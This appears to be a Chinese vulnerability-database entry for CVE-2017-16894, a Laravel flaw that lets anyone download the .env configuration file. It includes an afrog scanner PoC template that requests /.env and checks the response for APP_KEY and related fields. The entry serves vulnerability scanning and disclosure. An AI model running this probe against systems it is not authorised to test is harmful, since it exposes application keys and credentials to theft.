CVE-2017-16894: Laravel .env 配置文件泄露

日期: 2025-09-01 | 影响软件: Laravel | POC: 已公开

漏洞描述

Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息 根据泄露敏感信息严重程度,定性是中危或高危 app="Laravel-Framework"

PoC代码[已公开]

id: CVE-2017-16894

info:
  name: Laravel .env 配置文件泄露
  author: zan8in
  severity: high
  description: |
    Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息
    根据泄露敏感信息严重程度,定性是中危或高危
    app="Laravel-Framework"
  reference:
    - http://wiki.peiqi.tech/wiki/frame/Laravel/Laravel%20env%20%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%20CVE-2017-16894.html

rules:
  r0:
    request:
      method: GET
      path: /.env
    expression: response.status == 200 &&  response.body.bcontains(b'APP_NAME=Laravel') && response.body.bcontains(b'APP_ENV=') && response.body.bcontains(b'APP_KEY=')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2017/CVE-2017-16894.yaml

相关漏洞推荐